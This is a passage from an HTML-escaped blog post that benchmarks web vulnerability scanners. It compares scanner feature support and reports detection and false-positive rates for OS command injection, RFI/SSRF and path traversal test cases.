converting issues to virtual patch rules/defect tracking entries, periodic result gap analysis, defining externally 
scheduling scans, etc. The table uses a &lt;span style=&quot;color: lime;&quot;&gt;&lt;b&gt;check-mark&lt;/b&gt;&lt;/span&gt;&lt;/span&gt; to signify built-in feature support, and &lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;half-&lt;/span&gt;&lt;span style=&quot;color: red;&quot;&gt;cross&lt;/span&gt;&lt;/b&gt;/&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;half-check&lt;/span&gt;&lt;span style=&quot;color: red;&quot;&gt;-mark&lt;/span&gt;&lt;/b&gt; for external support through 3rd-party software or plugin.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;* Netsparker on-premise centrlized management frame is availble through an &lt;a href=&quot;https://www.netsparker.com/online-web-application-security-scanner/available-on-premises/&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;on-premise installation of netsparker cloud&lt;/b&gt;&lt;/a&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;* In particular - &lt;b&gt;burpsuite&lt;/b&gt;&lt;/span&gt;&lt;b&gt; &lt;/b&gt;&lt;u&gt;virtual patching&lt;/u&gt;
 rule generation is available through external mod-security scripts or 
through threatfix integration.The same applies for &quot;indirect&quot; &lt;u&gt;defect tracking support&lt;/u&gt;, &quot;enterprise-console&quot; vulnerability &lt;u&gt;management features&lt;/u&gt;, and &lt;u&gt;scan scheduling&lt;/u&gt; scheduling, which is possible by combining jenkins/team-city/sonar-cube with any scanner CLI interface.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;* articles describing methods of &quot;automating&quot; scans with burpsuite:&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;a href=&quot;https://www.securify.nl/blog/SFY20160901/burp-suite-security-automation-with-selenium-and-jenkins.html&quot; target=&quot;_blank&quot;&gt;https://www.securify.nl/blog/SFY20160901/burp-suite-security-automation-with-selenium-and-jenkins.html&amp;nbsp;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;*
 recent updates to burp CLI interface, external plugins makes it 
possible to use it in some CI scenarios - the extent is still verified 
by the author:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;a href=&quot;http://releases.portswigger.net/2017/&quot;&gt;http://releases.portswigger.net/2017/&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;* various external projects provide some interfaces to use &lt;b&gt;burpsuite &lt;/b&gt;with selenium, such as: &lt;a href=&quot;https://github.com/malerisch/burp-csj&quot; target=&quot;_blank&quot;&gt;https://github.com/malerisch/burp-csj&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;* Methods for manual/external selenium integration with &lt;b&gt;Netsparker / Burpsuite &lt;/b&gt;are officially documented:&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;a href=&quot;https://www.netsparker.com/blog/docs-and-faqs/selenium-netsparker-manual-crawling-web-applications-scanner/&quot;&gt;https://www.netsparker.com/blog/docs-and-faqs/selenium-netsparker-manual-crawling-web-applications-scanner/&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;&amp;nbsp;&amp;nbsp; &lt;a href=&quot;https://support.portswigger.net/customer/portal/articles/2669413-using-burp-with-selenium&quot;&gt;https://support.portswigger.net/customer/portal/articles/2669413-using-burp-with-selenium&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;&amp;nbsp;&amp;nbsp; Similar methods could be used with &lt;b&gt;webcruiser &lt;/b&gt;as well.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;* enterprise console management features are integrated into &lt;a href=&quot;https://www.ibm.com/support/knowledgecenter/en/SSW2NF_9.0.0/com.ibm.ase.help.doc/topics/c_intro_ase.html&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;appscan&lt;/b&gt;&lt;/a&gt;/&lt;b&gt;webinspect &lt;/b&gt;&lt;u&gt;&lt;b&gt;enterprise&lt;/b&gt;&lt;/u&gt;&lt;b&gt; &lt;/b&gt;versions.
 Other products may support the features either in cloud product 
variations or through integration with a 3rd party product (e.g. 
Threadfix, DefectDojo, etc).&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;* Webinspect/Appscan SAST modules hybrid-analysis features are actually more integrations with &lt;b&gt;Fortify &lt;/b&gt;(webinspect) and &lt;b&gt;Appscan-source&lt;/b&gt;. 3rd party products are also capable of performing hybrid analysis on seemingly unrelarted products.&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;color: cyan; font-size: small;&quot;&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;The following table presents a  comparison of built-in/external prominent SSDLC feature support in open source DAST tools:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;h3 style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;color: cyan; font-size: small;&quot;&gt;Click to Enlarge&lt;/span&gt;&lt;/h3&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL5LB1wpRef_dyabnx7pR1WJYaO6aZ8QYYnZoFd4SaJKsXpKaEiMkv6SGX4_5oJBDVG74gs2ihcpMO2DxvnjXEqkWwftMFXUt09luJeGFmX1kp8or3qO-c5i1JDsQActxptNz2leaDaH0/s1600/SSDLC-Feature-Support-OpenSource.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;900&quot; data-original-width=&quot;1600&quot; height=&quot;360&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL5LB1wpRef_dyabnx7pR1WJYaO6aZ8QYYnZoFd4SaJKsXpKaEiMkv6SGX4_5oJBDVG74gs2ihcpMO2DxvnjXEqkWwftMFXUt09luJeGFmX1kp8or3qO-c5i1JDsQActxptNz2leaDaH0/s640/SSDLC-Feature-Support-OpenSource.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Comparison notes:&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0in 5.4pt 0in 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;background: #404040; border: solid windowtext 1.0pt; mso-background-themecolor: text1; mso-background-themetint: 191; mso-border-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 431.5pt;&quot; valign=&quot;top&quot; width=&quot;575&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;* &lt;/span&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;Usage 
of external management frameworks (&lt;a href=&quot;https://github.com/continuumsecurity/bdd-security&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;BDD-Security&lt;/b&gt;&lt;/a&gt;, &lt;b&gt;&lt;a href=&quot;https://www.seccubus.com/&quot; target=&quot;_blank&quot;&gt;Seccubus&lt;/a&gt;&lt;/b&gt;,&lt;b&gt; &lt;a href=&quot;https://www.threadfix.it/&quot; target=&quot;_blank&quot;&gt;ThreatFix&lt;/a&gt;&lt;/b&gt;, &lt;a href=&quot;https://github.com/OWASP/django-DefectDojo&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;DefectDojo&lt;/b&gt;&lt;/a&gt;, &lt;a href=&quot;https://www.faradaysec.com/&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;Farady&lt;/b&gt;&lt;/a&gt;, 
&lt;a href=&quot;https://dradisframework.com/ce/&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;Dradis&lt;/b&gt;&lt;/a&gt;, &lt;b&gt;&lt;a href=&quot;https://jenkins.io/&quot; target=&quot;_blank&quot;&gt;Jenkis &lt;/a&gt;+ CLI&lt;/b&gt;) is able to &quot;compensate&quot; for &lt;b&gt;MANY&lt;/b&gt; of the missing 
SSDLC features of supported scanners, by parsing scanning reports and 
converting issues to virtual patch rules/defect tracking entries, &lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;periodic result gap analysis, &lt;/span&gt;&lt;/span&gt;defining externally 
scheduling scans, etc. &lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;The table uses a &lt;span style=&quot;color: lime;&quot;&gt;&lt;b&gt;check-mark&lt;/b&gt;&lt;/span&gt;&lt;/span&gt; to signify built-in feature support, and &lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;half-&lt;/span&gt;&lt;span style=&quot;color: red;&quot;&gt;cross&lt;/span&gt;&lt;/b&gt;/&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;half-check&lt;/span&gt;&lt;span style=&quot;color: red;&quot;&gt;-mark&lt;/span&gt;&lt;/b&gt; for external support through 3rd-party software or plugin.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;* In particular - &lt;b&gt;zap &lt;/b&gt;&lt;/span&gt;/ &lt;b&gt;arachni &lt;/b&gt;/ &lt;b&gt;w3af &lt;/b&gt;/ &lt;b&gt;skipfish &lt;/b&gt;&lt;u&gt;Virtual Patching&lt;/u&gt;
 rule generation is available through external mod-security scripts or 
through threatfix integration.The same applies for &quot;indirect&quot; &lt;u&gt;defect tracking support&lt;/u&gt;, &quot;enterprise-console&quot; vulnerability &lt;u&gt;management features&lt;/u&gt;, and &lt;u&gt;scan scheduling&lt;/u&gt; scheduling, which is possible by combining jenkins/team-city/sonar-cube with any scanner CLI interface.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;* arachni custom parsing of json is reported to being used to update jira defect tracking system:&lt;br /&gt;https://www.newcontext.com/automate-web-app-security-scanning/&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;* selenium support is available/partially available for some of the tools using the following methods:&lt;br /&gt;** arachni uses selenium webdrivers for login scenarios, support for importing selenium crawl results is unknown.&lt;br /&gt;** Unofficial plugins for using w3af with selenium has been published: &lt;a href=&quot;https://dumpz.org/16826/&quot;&gt;https://dumpz.org/16826/&lt;/a&gt;&lt;br /&gt;** External IronWASP selenium Integration module: &lt;a href=&quot;https://github.com/arorarajan/IronWaspSelenium/tree/V1&quot;&gt;https://github.com/arorarajan/IronWaspSelenium/tree/V1&lt;/a&gt;&lt;br /&gt;**
 Guides for using selenium through ZAP are available (while using 
various projects) - the process could theoritically be used for other 
scanners with proxy capabilities:&lt;br /&gt;&lt;a href=&quot;https://linkeshkannavelu.com/2015/01/08/security-test-automation-using-selenium-and-zap/&quot;&gt;https://linkeshkannavelu.com/2015/01/08/security-test-automation-using-selenium-and-zap/&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;https://securify.nl/blog/SFY20160601/using_owasp_zap__selenium__and_jenkins_to_automate_your_security_tests_.html&quot;&gt;https://securify.nl/blog/SFY20160601/using_owasp_zap__selenium__and_jenkins_to_automate_your_security_tests_.html&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;https://www.coveros.com/running-selenium-tests-zap/&quot;&gt;https://www.coveros.com/running-selenium-tests-zap/&lt;/a&gt;&lt;/span&gt;&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;div&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
In general, although some of the tools contain built-in SSDLC related features, 3rd party software (&lt;a href=&quot;https://github.com/denimgroup/threadfix/wiki/Dynamic-Scanners&quot; target=&quot;_blank&quot;&gt;ThreadFix &lt;/a&gt;/ &lt;a href=&quot;https://github.com/OWASP/django-DefectDojo/tree/master/dojo/tools&quot; target=&quot;_blank&quot;&gt;DefectDojo &lt;/a&gt;/ &lt;a href=&quot;https://dradisframework.com/integrations/&quot; target=&quot;_blank&quot;&gt;Dradis &lt;/a&gt;/ &lt;a href=&quot;https://www.seccubus.com/documentation/02-scan-setup/&quot; target=&quot;_blank&quot;&gt;Seccubus &lt;/a&gt;/ &lt;a href=&quot;https://github.com/continuumsecurity/bdd-security&quot; target=&quot;_blank&quot;&gt;BDD-Security&lt;/a&gt; / &lt;a href=&quot;https://www.faradaysec.com/#integreated-pentest-environment&quot; target=&quot;_blank&quot;&gt;Faraday &lt;/a&gt;/ Jenkins) can enhance the scanner capabilities through external features and integration.&lt;br /&gt;
&lt;br /&gt;
These solutions typically have either commercial and/or integration costs, but may be able to allow using most of the tools in SSDLC scenarios with some integration effort, while providing the various benefits of a commercial-scale managed platform.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h3&gt;
&lt;b&gt;3.4 The Detection Ratio of OS Command Injection (&lt;span style=&quot;color: yellow;&quot;&gt;New!&lt;/span&gt;)&lt;/b&gt;&lt;/h3&gt;
&lt;br /&gt;
To expand the coverage of the benchmark evaluated features, dedicated test cases were implemented to simulate entry points vulnerable to &lt;b&gt;OS command injection&lt;/b&gt;.&lt;br /&gt;
&lt;br /&gt;
Unlike most of the previous benchmark evaluations, this year&#39;s benchmark included test cases with JSON/XML support (primarly implmented in the extension project &lt;b&gt;wavsep-ext&lt;/b&gt;).&lt;br /&gt;
In total, the OS-command injection benchamrk included &lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;224 &lt;/span&gt;NEW &lt;/b&gt;test cases, half of which were with &lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;JSON/XML&lt;/b&gt;&lt;/span&gt; inputs.&lt;br /&gt;
&lt;br /&gt;
The following table presents the OS Command Injection detection / false-positive ratio of commercial DAST vendors:&lt;br /&gt;
&lt;h3 style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;color: cyan; font-size: small;&quot;&gt;OS Command Injection Benchmark - Commercial Vendors - Click to Enlarge&lt;/span&gt;&lt;/h3&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&amp;nbsp;&lt;span style=&quot;font-size: xx-small;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJRtRF82CwP9G4EQe4OBuKsO6YzScQ9egiy81s9BaNDTI-quFkMRP4-znLWRSBkuaQjkBLivb_kytHRgHVGJGcUFlloBeLZtGwKXyGG5YXHZ_AzPuDsh-5u9b69gUqvJQTAjC_VsMePg4/s1600/OSCommanding-Commercial-FIXED.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;900&quot; data-original-width=&quot;1600&quot; height=&quot;360&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJRtRF82CwP9G4EQe4OBuKsO6YzScQ9egiy81s9BaNDTI-quFkMRP4-znLWRSBkuaQjkBLivb_kytHRgHVGJGcUFlloBeLZtGwKXyGG5YXHZ_AzPuDsh-5u9b69gUqvJQTAjC_VsMePg4/s640/OSCommanding-Commercial-FIXED.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;* missing results from 2-4 additional commercial vendors will be updated in the upcoming weeks.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;* In order to get to a score of 100% with Netsparker, it&#39;s required to disable the &quot;content optimization features&quot;, otherwise the score will be 45.98%.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;Since WAVSEP test cases look very similar to each other (rare in real life applications), various products with scan optimization features may ignore some of the test cases since they will be categorized as &quot;identical pages&quot;, and thus scanning may require similar configurations in other products as well. &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;To disable it Hold Down CTRL WHILE Clicking &quot;Options&quot;-&amp;gt;Change &quot;DisableContentOptimization&quot; to TRUE, Save and Restart Netsparker.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following table presents the OS Command Injection detection / false-positive ratio of open source DAST projects:&lt;br /&gt;
&lt;h3 style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;color: cyan; font-size: small;&quot;&gt;OS Command Injection Benchmark - Open Source Vendors - Click to Enlarge&lt;/span&gt;&lt;/h3&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj61B8IZ8-ma60nAtQHfEOEA5Kta973vHt0rI_oMsl18v70ZOaWS26c3-yNJZvdkOfsDm7i8ksz0cvGSFx3pysIsQ8cbuyawuwP0_K6CjsigOh3IV3hDO8y_2VL65nVGvL95SgQznihyphenhyphenZQ/s1600/OSCommanding-OpenSource.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;900&quot; data-original-width=&quot;1600&quot; height=&quot;360&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj61B8IZ8-ma60nAtQHfEOEA5Kta973vHt0rI_oMsl18v70ZOaWS26c3-yNJZvdkOfsDm7i8ksz0cvGSFx3pysIsQ8cbuyawuwP0_K6CjsigOh3IV3hDO8y_2VL65nVGvL95SgQznihyphenhyphenZQ/s640/OSCommanding-OpenSource.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h3&gt;
&lt;b&gt;3.5 The Detection Ratio of Remote File Inclusion/SSRF (Altered)&lt;/b&gt;&lt;/h3&gt;
&lt;h3&gt;
&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/h3&gt;
Although (XSS via) &lt;b&gt;remote file inclusion&lt;/b&gt; (&lt;b&gt;RFI&lt;/b&gt;) test cases were covered in previous benchmarks, in terms of exploitation, we didn&#39;t treat them as potential SSRF (server-side request forgery) vulnerable entry points, an exploitation method which is (arguably) more severe then XSS-via-RFI.&lt;br /&gt;
&lt;br /&gt;
This year we included both RFI and SSRF plugins in the scans of the original &quot;RFI&quot; test cases, which might have affected the results.&lt;br /&gt;
Furthermore, as in the case of OS command injection, &lt;b&gt;NEW &lt;/b&gt;test cases for JSON/XML inputs were implemented for &lt;b&gt;SSRF/RFI&lt;/b&gt;, effectively &lt;b&gt;doubling &lt;/b&gt;the number of tests from 108 to &lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;216 &lt;/b&gt;&lt;/span&gt;valid test cases (108 &lt;b&gt;NEW&lt;/b&gt; test cases), with the previous 6 false positive categories remaining intact.&lt;br /&gt;
&lt;br /&gt;
However, at the moment, new &quot;blind&quot; SSRF test cases were not (YET) included in the benchmark, due to time-frame and licensing constraints, so evaluations of out-of-band SSRF detection mechanisms are still pending.&lt;br /&gt;
&lt;br /&gt;
The following table presents the &lt;b&gt;RFI / SSRF&lt;/b&gt; detection / false-positive ratio of commercial DAST vendors:&lt;br /&gt;
&lt;h3 style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;color: cyan; font-size: small;&quot;&gt;RFI / SSRF Benchmark - Commercial Vendors - Click to Enlarge&lt;/span&gt;&lt;/h3&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOc_7XFR5Od-IFT4UsiCbrBjP7aw0xqgxUbxj1STobxVkEMZqLAm8q69-uoj3B76UkNdMAEisjXIIAby-yp75QMEdQFIexsKzouLpqLkafQRTgY3_o_dvztKRjX-LFfSmtT3q8BggJGYk/s1600/RFI-Commercial.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;900&quot; data-original-width=&quot;1600&quot; height=&quot;360&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOc_7XFR5Od-IFT4UsiCbrBjP7aw0xqgxUbxj1STobxVkEMZqLAm8q69-uoj3B76UkNdMAEisjXIIAby-yp75QMEdQFIexsKzouLpqLkafQRTgY3_o_dvztKRjX-LFfSmtT3q8BggJGYk/s640/RFI-Commercial.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;*&lt;/b&gt; results from previous benchmarks might be &lt;b&gt;DRASTICALLY &lt;/b&gt;different due to the introduction of 108 NEW JSON/XML test cases.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;*&lt;/b&gt; the GET/POST only results of Appscan, Syhunt and N-Stalker were intentionally not published as to avoid misinterpretation. The products updated results might be published in the upcoming weeks.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
The following table presents the &lt;b&gt;RFI / SSRF&lt;/b&gt; detection / false-positive ratio of open source DAST projects:&lt;br /&gt;
&lt;h3 style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;color: cyan; font-size: small;&quot;&gt;RFI / SSRF Benchmark - Open Source Vendors - Click to Enlarge&lt;/span&gt;&lt;/h3&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgviimnEIvR8xOxfiNHDmi5BW4k3L2j49SKpfO7cGZLQ6gSYhOEUPUNymtdIpZAAAO_ogjVzwWc5zCc7veSYqTE1hHEMa2TepFrJiA0BWCtLdwGxFgIJEMNEmdPny4D4lHuOpLXowJ_mSI/s1600/RFI-OpenSource.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;900&quot; data-original-width=&quot;1600&quot; height=&quot;360&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgviimnEIvR8xOxfiNHDmi5BW4k3L2j49SKpfO7cGZLQ6gSYhOEUPUNymtdIpZAAAO_ogjVzwWc5zCc7veSYqTE1hHEMa2TepFrJiA0BWCtLdwGxFgIJEMNEmdPny4D4lHuOpLXowJ_mSI/s640/RFI-OpenSource.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;*&lt;/b&gt; results from previous benchmarks might be &lt;b&gt;DRASTICALLY &lt;/b&gt;different due to the introduction of 108 NEW JSON/XML test cases. &lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h3&gt;
&lt;b&gt;3.6 The Detection Ratio of Path Traversal (Update)&lt;/b&gt;&lt;/h3&gt;
&lt;br /&gt;
The evaluation used the same &lt;b&gt;Path-Traversal/LFI&lt;/b&gt; test-bed used in the previous 
benchmarks, which cover GET and POST input delivery vectors in 816 valid test 
cases, and 8 false positive categories. Due to some automation methods on our part, the interpretation of certain false-positive test cases might be more severe than in previous benchmarks.&lt;br /&gt;
&lt;br /&gt;
The following table presents the&lt;b&gt; Path Traversal&lt;/b&gt; detection / false-positive ratio of commercial DAST vendors:&lt;br /&gt;
&lt;h3 style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;color: cyan; font-size: small;&quot;&gt;Path Traversal Benchmark - Commercial Vendors - Click to Enlarge&lt;/span&gt;&lt;/h3&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPm66Ko-tukQF6jgXqUk1dypu_hbyJZROEuH8_WdpiVQeJENvDYU-7bEoyEk8Y7rpn1toHhoksIbp6lHU1hgVAGdiCcQudiAOHc6f0I07_JS4wf9ZKpXHkw86DUiycxhyphenhyphenjMDgJ-DxVYgI/s1600/Path-Traversal-Commercial.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;900&quot; data-original-width=&quot;1600&quot; height=&quot;360&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPm66Ko-tukQF6jgXqUk1dypu_hbyJZROEuH8_WdpiVQeJENvDYU-7bEoyEk8Y7rpn1toHhoksIbp6lHU1hgVAGdiCcQudiAOHc6f0I07_JS4wf9ZKpXHkw86DUiycxhyphenhyphenjMDgJ-DxVYgI/s640/Path-Traversal-Commercial.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;*&lt;/b&gt; due to incomplete QA processes on our behalf, the results of &lt;b&gt;Acunetix &lt;/b&gt;and &lt;b&gt;Webinspect &lt;/b&gt;may require an update in the next few weeks. &lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
